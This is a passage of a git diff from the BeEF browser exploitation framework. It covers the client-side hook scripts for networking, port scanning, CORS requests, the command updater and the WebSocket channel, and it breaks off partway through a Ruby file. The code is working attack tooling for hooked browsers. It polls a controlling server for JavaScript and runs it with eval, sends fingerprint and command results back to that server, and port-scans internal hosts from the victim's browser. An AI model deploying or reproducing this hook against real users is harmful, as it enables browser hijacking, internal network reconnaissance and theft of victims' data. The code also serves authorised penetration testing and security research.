a!=+a?b!=+b:(a==0?1/a==1/b:a==+b);case"[object Date]":case"[object Boolean]":return +a==+b;case"[object RegExp]":return a.source==b.source&&a.global==b.global&&a.multiline==b.multiline&&a.ignoreCase==b.ignoreCase}if(typeof a!="object"||typeof b!="object"){return false}var length=stack.length;while(length--){if(stack[length]==a){return true}}stack.push(a);var size=0,result=true;if(className=="[object Array]"){size=a.length;result=size==b.length;if(result){while(size--){if(!(result=size in a==size in b&&eq(a[size],b[size],stack))){break}}}}else{if("constructor" in a!="constructor" in b||a.constructor!=b.constructor){return false}for(var key in a){if(_.has(a,key)){size++;if(!(result=_.has(b,key)&&eq(a[key],b[key],stack))){break}}}if(result){for(key in b){if(_.has(b,key)&&!(size--)){break}}result=!size}}stack.pop();return result}_.isEqual=function(a,b){return eq(a,b,[])};_.isEmpty=function(obj){if(obj==null){return true}if(_.isArray(obj)||_.isString(obj)){return obj.length===0}for(var key in obj){if(_.has(obj,key)){return false}}return true};_.isElement=function(obj){return !!(obj&&obj.nodeType==1)};_.isArray=nativeIsArray||function(obj){return toString.call(obj)=="[object Array]"};_.isObject=function(obj){return obj===Object(obj)};_.isArguments=function(obj){return toString.call(obj)=="[object Arguments]"};if(!_.isArguments(arguments)){_.isArguments=function(obj){return !!(obj&&_.has(obj,"callee"))}}_.isFunction=function(obj){return toString.call(obj)=="[object Function]"};_.isString=function(obj){return toString.call(obj)=="[object String]"};_.isNumber=function(obj){return toString.call(obj)=="[object Number]"};_.isFinite=function(obj){return _.isNumber(obj)&&isFinite(obj)};_.isNaN=function(obj){return obj!==obj};_.isBoolean=function(obj){return obj===true||obj===false||toString.call(obj)=="[object Boolean]"};_.isDate=function(obj){return toString.call(obj)=="[object Date]"};_.isRegExp=function(obj){return toString.call(obj)=="[object RegExp]"};_.isNull=function(obj){return obj===null};_.isUndefined=function(obj){return obj===void 0};_.has=function(obj,key){return hasOwnProperty.call(obj,key)};_.noConflict=function(){root._=previousUnderscore;return this};_.identity=function(value){return value};_.times=function(n,iterator,context){for(var i=0;i/g,">").replace(/"/g,""").replace(/'/g,"'").replace(/\//g,"/")};_.result=function(object,property){if(object==null){return null}var value=object[property];return _.isFunction(value)?value.call(object):value};_.mixin=function(obj){each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name])})};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id};_.templateSettings={evaluate:/<::([\s\S]+?)::>/g,interpolate:/<::=([\s\S]+?)::>/g,escape:/<:-([\s\S]+?):>/g};var noMatch=/.^/;var escapes={"\\":"\\","'":"'",r:"\r",n:"\n",t:"\t",u2028:"\u2028",u2029:"\u2029"};for(var p in escapes){escapes[escapes[p]]=p}var escaper=/\\|'|\r|\n|\t|\u2028|\u2029/g;var unescaper=/\\(\\|'|r|n|t|u2028|u2029)/g;var unescape=function(code){return code.replace(unescaper,function(match,escape){return escapes[escape]})};_.template=function(text,data,settings){settings=_.defaults(settings||{},_.templateSettings);var source="__p+='"+text.replace(escaper,function(match){return"\\"+escapes[match]}).replace(settings.escape||noMatch,function(match,code){return"'+\n_.escape("+unescape(code)+")+\n'"}).replace(settings.interpolate||noMatch,function(match,code){return"'+\n("+unescape(code)+")+\n'"}).replace(settings.evaluate||noMatch,function(match,code){return"';\n"+unescape(code)+"\n;__p+='"})+"';\n";if(!settings.variable){source="with(obj||{}){\n"+source+"}\n"}source="var __p='';var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n"+source+"return __p;\n";var render=new Function(settings.variable||"obj","_",source);if(data){return render(data,_)}var template=function(data){return render.call(this,data,_)};template.source="function("+(settings.variable||"obj")+"){\n"+source+"}";return template};_.chain=function(obj){return _(obj).chain()};var wrapper=function(obj){this._wrapped=obj};_.prototype=wrapper.prototype;var result=function(obj,chain){return chain?_(obj).chain():obj};var addToWrapper=function(name,func){wrapper.prototype[name]=function(){var args=slice.call(arguments);unshift.call(args,this._wrapped);return result(func.apply(_,args),this._chain)}};_.mixin(_);each(["pop","push","reverse","shift","sort","splice","unshift"],function(name){var method=ArrayProto[name];wrapper.prototype[name]=function(){var wrapped=this._wrapped;method.apply(wrapped,arguments);var length=wrapped.length;if((name=="shift"||name=="splice")&&length===0){delete wrapped[0]}return result(wrapped,this._chain)}});each(["concat","join","slice"],function(name){var method=ArrayProto[name];wrapper.prototype[name]=function(){return result(method.apply(this._wrapped,arguments),this._chain)}});wrapper.prototype.chain=function(){this._chain=true;return this};wrapper.prototype.value=function(){return this._wrapped}}).call(this)}); \ No newline at end of file diff --git a/core/main/client/logger.js b/core/main/client/logger.js index 5c3c6e2b5..3d1217c37 100644 --- a/core/main/client/logger.js +++ b/core/main/client/logger.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.logger * diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index 626b36ce8..6d2229693 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.mitb = { cid:null, diff --git a/core/main/client/net.js b/core/main/client/net.js index 66daf0245..62c98a8ac 100644 --- a/core/main/client/net.js +++ b/core/main/client/net.js @@ -1,35 +1,37 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net * - * Provides basic networking functions. + * Provides basic networking functions, + * like beef.net.request and beef.net.forgeRequest, + * used by BeEF command modules and the Requester extension, + * as well as beef.net.send which is used to return commands + * to BeEF server-side components. + * + * Also, it contains the core methods used by the XHR-polling + * mechanism (flush, queue) */ beef.net = { host:"<%= @beef_host %>", port:"<%= @beef_port %>", hook:"<%= @beef_hook %>", + httpproto:"<%= @beef_proto %>", handler:'/dh', chop:500, pad:30, //this is the amount of padding for extra params such as pc, pid and sid sid_count:0, cmd_queue:[], - //Command object + /** + * Command object. This represents the data to be sent back to BeEF, + * using the beef.net.send() method. + */ command:function () { this.cid = null; this.results = null; @@ -37,13 +39,17 @@ beef.net = { this.callback = null; }, - //Packet object + /** + * Packet object. A single chunk of data. X packets -> 1 stream + */ packet:function () { this.id = null; this.data = null; }, - //Stream object + /** + * Stream object. Contains X packets, which are command result chunks. + */ stream:function () { this.id = null; this.packets = []; @@ -59,7 +65,8 @@ beef.net = { /** * Response Object - used in the beef.net.request callback - * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated. + * NOTE: as we are using async mode, the response object will be empty if returned. + * Using sync mode, request obj fields will be populated. */ response:function () { this.status_code = null; // 500, 404, 200, 302 @@ -72,7 +79,13 @@ beef.net = { this.headers = null; // full response headers }, - //Queues the command, to be sent back to the framework on the next refresh + /** + * Queues the specified command results. + * @param: {String} handler: the server-side handler that will be called + * @param: {Integer} cid: command id + * @param: {String} results: the data to send + * @param: {Function} callback: the function to call after execution + */ queue:function (handler, cid, results, callback) { if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) { var s = new beef.net.command(); @@ -84,26 +97,40 @@ beef.net = { } }, - //Queues the current command and flushes the queue straight away + /** + * Queues the current command results and flushes the queue straight away. + * NOTE: Always send Browser Fingerprinting results + * (beef.net.browser_details(); -> /init handler) using normal XHR-polling, + * even if WebSockets are enabled. + * @param: {String} handler: the server-side handler that will be called + * @param: {Integer} cid: command id + * @param: {String} results: the data to send + * @param: {Function} callback: the function to call after execution + */ send:function (handler, cid, results, callback) { - if (typeof beef.websocket === "undefined") { + if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) { this.queue(handler, cid, results, callback); this.flush(); - } - else { + }else { try { beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid + '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) + '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }'); - } - catch (e) { + }catch (e) { this.queue(handler, cid, results, callback); this.flush(); - } + } } }, - //Flush all currently queued commands to the framework + /** + * Flush all currently queued command results to the framework, + * chopping the data in chunks ('chunk' method) which will be re-assembled + * server-side by the network stack. + * NOTE: currently 'flush' is used only with the default + * XHR-polling mechanism. If WebSockets are used, the data is sent + * back to BeEF straight away. + */ flush:function () { if (this.cmd_queue.length > 0) { var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue)); @@ -127,22 +154,30 @@ beef.net = { } }, - //Split string into chunk lengths determined by amount + /** + * Split the input data into chunk lengths determined by the amount parameter. + * @param: {String} str: the input data + * @param: {Integer} amount: chunk length + */ chunk:function (str, amount) { if (typeof amount == 'undefined') n = 2; return str.match(RegExp('.{1,' + amount + '}', 'g')); }, - //Push packets to framework + /** + * Push the input stream back to the BeEF server-side components. + * It uses beef.net.request to send back the data. + * @param: {Object} stream: the stream object to be sent back. + */ push:function (stream) { //need to implement wait feature here eventually for (var i = 0; i < stream.pc; i++) { - this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); + this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); } }, /** - *Performs http requests + * Performs http requests * @param: {String} scheme: HTTP or HTTPS * @param: {String} method: GET or POST * @param: {String} domain: bindshell.net, 192.168.3.4, etc @@ -201,13 +236,12 @@ beef.net = { data:data, timeout:(timeout * 1000), - //needed otherwise jQuery always add Content-type: application/xml, even if data is populated + //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated. beforeSend:function (xhr) { if (method == "POST") { xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8"); } }, - success:function (data, textStatus, xhr) { var end_time = new Date().getTime(); response.status_code = xhr.status; @@ -248,9 +282,11 @@ beef.net = { }, /* - * Similar to this.request, except from a few things that are needed when dealing with forged requests: + * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests: * - requestid: needed on the callback * - allowCrossDomain: set cross-domain requests as allowed or blocked + * + * forge_request is used mainly by the Requester and Tunneling Proxy Extensions. */ forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) { @@ -293,14 +329,21 @@ beef.net = { return response; } - // build and execute the request - if (method == "POST") { + /* + * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script': + * This will turn POSTs into GETs for remote-domain requests. + */ + if (method == "POST"){ $j.ajaxSetup({ - data:data + dataType: dataType + }); + } else { + $j.ajaxSetup({ + dataType: 'script' }); } - // this is required for bugs in IE so data can be transfered back to the server + // this is required for bugs in IE so data can be transferred back to the server if ( beef.browser.isIE() ) { dataType = 'script' } @@ -311,9 +354,7 @@ beef.net = { headers: headers, timeout: (timeout * 1000), - // needed otherwise jQuery always adds: - // Content-type: application/xml - // even if data is populated + //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated. beforeSend:function (xhr) { if (method == "POST") { xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8"); @@ -415,7 +456,9 @@ beef.net = { return false; }, - //Sends back browser details to framework + /** + * Sends back browser details to framework, calling beef.browser.getDetails() + */ browser_details:function () { var details = beef.browser.getDetails(); details['HookSessionID'] = beef.session.get_hook_session_id(); diff --git a/core/main/client/net/cors.js b/core/main/client/net/cors.js new file mode 100644 index 000000000..01cf86008 --- /dev/null +++ b/core/main/client/net/cors.js @@ -0,0 +1,77 @@ +beef.net.cors = { + + handler: "cors", + + /** + * Response Object - used in the beef.net.request callback + */ + response:function () { + this.status = null; // 500, 404, 200, 302, etc + this.headers = null; // full response headers + this.body = null; // full response body + }, + + /** + * Make a cross-domain request using CORS + * + * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.) + * @param url {String} url + * @param data {String} request body + * @param callback {Function} function to callback on completion + */ + request: function(method, url, data, callback) { + + var xhr; + var response = new this.response; + + if (XMLHttpRequest) { + xhr = new XMLHttpRequest(); + + if ('withCredentials' in xhr) { + xhr.open(method, url, true); + xhr.onerror = function() { + }; + xhr.onreadystatechange = function() { + if (xhr.readyState === 4) { + response.headers = this.getAllResponseHeaders() + response.body = this.responseText; + response.status = this.status; + if (!!callback) { + if (!!response) { + callback(response); + } else { + callback('ERROR: No Response. CORS requests may be denied for this resource.') + } + } + } + }; + xhr.send(data); + } + } else if (typeof XDomainRequest != "undefined") { + xhr = new XDomainRequest(); + xhr.open(method, url); + xhr.onerror = function() { + }; + xhr.onload = function() { + response.headers = this.getAllResponseHeaders() + response.body = this.responseText; + response.status = this.status; + if (!!callback) { + if (!!response) { + callback(response); + } else { + callback('ERROR: No Response. CORS requests may be denied for this resource.') + } + } + }; + xhr.send(data); + } else { + if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.'); + } + + } + +}; + +beef.regCmp('beef.net.cors'); + diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js index e2f2b8b5c..698b0301b 100644 --- a/core/main/client/net/dns.js +++ b/core/main/client/net/dns.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net.dns * diff --git a/core/main/client/net/local.js b/core/main/client/net/local.js index 5aa7087ec..545ba8105 100644 --- a/core/main/client/net/local.js +++ b/core/main/client/net/local.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net.local * diff --git a/core/main/client/net/portscanner.js b/core/main/client/net/portscanner.js index 75baede99..caa0131eb 100644 --- a/core/main/client/net/portscanner.js +++ b/core/main/client/net/portscanner.js @@ -1,63 +1,54 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * @literal object: beef.net.portscanner - * - * Provides port scanning functions for the zombie. A mod of pdp's scanner - * - * Version: '0.1', - * author: 'Petko Petkov', - * homepage: 'http://www.gnucitizen.org' - */ - -beef.net.portscanner = { - - scanPort: function(callback, target, port, timeout) - { - var timeout = (timeout == null)?100:timeout; - var img = new Image(); - - img.onerror = function () { - if (!img) return; - img = undefined; - callback(target, port, 'open'); - }; - - img.onload = img.onerror; - - img.src = 'http://' + target + ':' + port; - - setTimeout(function () { - if (!img) return; - img = undefined; - callback(target, port, 'closed'); - }, timeout); - - }, - - scanTarget: function(callback, target, ports_str, timeout) - { - var ports = ports_str.split(","); - - for (index = 0; index < ports.length; index++) { - this.scanPort(callback, target, ports[index], timeout); - }; - - } -}; - -beef.regCmp('beef.net.portscanner'); - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * @literal object: beef.net.portscanner + * + * Provides port scanning functions for the zombie. A mod of pdp's scanner + * + * Version: '0.1', + * author: 'Petko Petkov', + * homepage: 'http://www.gnucitizen.org' + */ + +beef.net.portscanner = { + + scanPort: function(callback, target, port, timeout) + { + var timeout = (timeout == null)?100:timeout; + var img = new Image(); + + img.onerror = function () { + if (!img) return; + img = undefined; + callback(target, port, 'open'); + }; + + img.onload = img.onerror; + + img.src = 'http://' + target + ':' + port; + + setTimeout(function () { + if (!img) return; + img = undefined; + callback(target, port, 'closed'); + }, timeout); + + }, + + scanTarget: function(callback, target, ports_str, timeout) + { + var ports = ports_str.split(","); + + for (index = 0; index < ports.length; index++) { + this.scanPort(callback, target, ports[index], timeout); + }; + + } +}; + +beef.regCmp('beef.net.portscanner'); + diff --git a/core/main/client/net/requester.js b/core/main/client/net/requester.js index 8d51128f1..ad388282e 100644 --- a/core/main/client/net/requester.js +++ b/core/main/client/net/requester.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.net.requester * diff --git a/core/main/client/os.js b/core/main/client/os.js index c133edcc9..f6dfae17c 100644 --- a/core/main/client/os.js +++ b/core/main/client/os.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.os = { ua: navigator.userAgent, @@ -72,7 +63,11 @@ beef.os = { isMacintosh: function() { return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false; }, - + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + isIphone: function() { return (this.ua.indexOf('iPhone') != -1) ? true : false; }, @@ -97,6 +92,10 @@ beef.os = { return (this.ua.match('BlackBerry')) ? true : false; }, + isWebOS: function() { + return (this.ua.match('webOS')) ? true : false; + }, + isQNX: function() { return (this.ua.match('QNX')) ? true : false; }, @@ -139,11 +138,14 @@ beef.os = { if(this.isSunOS()) return 'Sun OS'; //iPhone - if (this.isIphone()) return 'iPhone'; + if (this.isIphone()) return 'iOS'; //iPad - if (this.isIpad()) return 'iPad'; + if (this.isIpad()) return 'iOS'; //iPod - if (this.isIpod()) return 'iPod'; + if (this.isIpod()) return 'iOS'; + + // zune + //if (this.isZune()) return 'Zune'; //macintosh if(this.isMacintosh()) { @@ -156,6 +158,7 @@ beef.os = { //others if(this.isQNX()) return 'QNX'; if(this.isBeOS()) return 'BeOS'; + if(this.isWebOS()) return 'webOS'; return 'unknown'; } diff --git a/core/main/client/session.js b/core/main/client/session.js index 040cf81a6..8dc4e6a8d 100644 --- a/core/main/client/session.js +++ b/core/main/client/session.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @literal object: beef.session * @@ -77,26 +68,7 @@ beef.session = { } return hook_session_id; - }, - - /** - * Overrides each link, and creates an iframe (loading the href) instead of following the link - */ - persistent: function() { - $j('a').click(function(e) { - if ($j(this).attr('href') != '') - { - e.preventDefault(); - beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null); - $j(document).attr('title', $j(this).html()); - document.body.scroll = "no"; - document.documentElement.style.overflow = 'hidden'; - } - }); } - - - }; beef.regCmp('beef.session'); diff --git a/core/main/client/timeout.js b/core/main/client/timeout.js new file mode 100644 index 000000000..43d875f97 --- /dev/null +++ b/core/main/client/timeout.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + Sometimes there are timing issues and looks like beef_init + is not called at all (always in cross-domain situations, + for example calling the hook with jquery getScript, + or sometimes with event handler injections). + + To fix this, we call again beef_init after 1 second. + Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece + antisnatchor + */ +setTimeout(beef_init, 1000); \ No newline at end of file diff --git a/core/main/client/updater.js b/core/main/client/updater.js index 4987de6f8..912e64b16 100644 --- a/core/main/client/updater.js +++ b/core/main/client/updater.js @@ -1,29 +1,20 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * @Literal object: beef.updater * * Object in charge of getting new commands from the BeEF framework and execute them. + * The XHR-polling channel is managed here. If WebSockets are enabled, + * websocket.ls is used instead. */ beef.updater = { - // Low timeouts combined with the way the framework sends commamd modules result - // in instructions being sent repeatedly or complex code. - // If you suffer from ADHD, you can decrease this setting. - timeout: 5000, + // XHR-polling timeout. + xhr_poll_timeout: "<%= @xhr_poll_timeout %>", // A lock. lock: false, @@ -51,22 +42,22 @@ beef.updater = { beef.net.flush(); if(beef.commands.length > 0) { this.execute_commands(); - } - - else { + }else { this.get_commands(); /*Polling*/ } } // ( typeof beef.websocket === "undefined") - setTimeout("beef.updater.check();", beef.updater.timeout); + setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout); }, - // Gets new commands from the framework. - get_commands: function(http_response) { + /** + * Gets new commands from the framework. + */ + get_commands: function() { try { this.lock = true; - beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) { + beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) { if (response.body != null && response.body.length > 0) beef.updater.execute_commands(); }); @@ -77,13 +68,12 @@ beef.updater = { this.lock = false; }, - // Executes the received commands if any. + /** + * Executes the received commands, if any. + */ execute_commands: function() { if(beef.commands.length == 0) return; - this.lock = true; - /*here execute the command */ - while(beef.commands.length > 0) { command = beef.commands.pop(); try { @@ -92,7 +82,6 @@ beef.updater = { console.error('execute_commands - command failed to execute: ' + e.message); } } - this.lock = false; } }; diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js index 25ccdeeba..796980990 100644 --- a/core/main/client/websocket.js +++ b/core/main/client/websocket.js @@ -1,72 +1,90 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -//beef.websocket.socket.send(take answer to server beef) -/*New browser init call this */ + +/** + * @Literal object: beef.websocket + * + * Manage the WebSocket communication channel. + * This channel is much faster and responsive, and it's used automatically + * if the browser supports WebSockets AND beef.http.websocket.enable = true. + */ beef.websocket = { socket:null, - alive_timer:<%= @websocket_timer %>, + ws_poll_timeout: "<%= @ws_poll_timeout %>", + /** + * Initialize the WebSocket client object. + * Note: use WebSocketSecure only if the hooked domain is under https. + * Mixed-content in WS is quite different from a non-WS context. + */ init:function () { var webSocketServer = beef.net.host; - var webSocketPort = <%= @websocket_port %>; - var webSocketSecure = <%= @websocket_secure %>; + var webSocketPort = "<%= @websocket_port %>"; + var webSocketSecure = "<%= @websocket_secure %>"; var protocol = "ws://"; - if(webSocketSecure) + if(webSocketSecure && window.location.protocol=="https:"){ protocol = "wss://"; + webSocketPort= "<%= @websocket_sec_port %>"; + } if (beef.browser.isFF() && !!window.MozWebSocket) { beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/"); - - } else { + }else{ beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/"); } }, - /* send Helo message to the BeEF server and start async communication*/ + + /** + * Send Helo message to the BeEF server and start async polling. + */ start:function () { new beef.websocket.init(); this.socket.onopen = function () { - //console.log("Socket has been opened!"); - - /*send browser id*/ beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}'); - //console.log("Connected and Helo"); beef.websocket.alive(); - } + }; + this.socket.onmessage = function (message) { - //console.log("Received message via WS."+ message.data); + //todo: double-check if there is a way to don't use eval here. It's not a big deal, + //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted. eval(message.data); - } + }; + this.socket.onclose = function () { + setTimeout(function(){beef.websocket.start()}, 5000); + }; }, + /** + * Send data back to BeEF. This is basically the same as beef.net.send, + * but doesn't queue commands. + * Example usage: + * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid + + * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) + + * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }'); + */ send:function (data) { - this.socket.send(data); -// console.log("Sent [" + data + "]"); + try { + this.socket.send(data); + }catch(err){} }, + /** + * Polling mechanism, to notify the BeEF server that the browser is still hooked, + * and the WebSocket channel still alive. + * todo: there is probably a more efficient way to do this. Double-check WebSocket API. + */ alive: function (){ beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}'); -// console.log("sent alive"); - setTimeout("beef.websocket.alive()", beef.websocket.alive_timer); - + setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout); } }; diff --git a/core/main/command.rb b/core/main/command.rb index 577cd39d6..3ebd42497 100644 --- a/core/main/command.rb +++ b/core/main/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS 